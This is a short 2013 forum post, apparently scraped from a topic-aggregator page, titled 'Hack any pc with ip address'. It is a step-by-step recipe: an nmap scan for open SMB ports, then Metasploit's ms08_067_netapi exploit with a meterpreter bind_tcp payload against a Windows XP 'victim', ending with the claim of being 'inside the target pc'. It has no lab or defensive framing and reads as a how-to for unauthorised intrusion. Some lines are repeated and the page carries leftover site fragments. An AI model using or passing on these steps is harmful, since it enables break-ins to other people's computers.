Hack any pc with ip address.. Hack any pc with ip - TopicsExpress



          

Hack any pc with ip address.. Hack any pc with ip address.. Requirements: nmap and metaspolit. open terminal and write . nmap -sS -O If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be to run metaspolit type msf in terminal and hit enter . We write at the terminal “show exploits” and we get a list of the avaliable exploits. - We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi ”. Now we set RHOST to our victims ip: “set RHOST ” - And RPORT to 445: “set RPORT 445 Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again set PAYLOAD windows/meterpreter/bind_tcp If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx) - Meterpeter is running. We are inside the target pc! Meterpeter is running. We are inside the target pc! if u saw this then you hacked this pc. We are inside the target pc! Note: its only for window xp victim.. nmap and metaspolit is available on bt5
Posted on: Tue, 17 Sep 2013 13:49:35 +0000

Trending Topics



ople who suffer from

Recently Viewed Topics




© 2015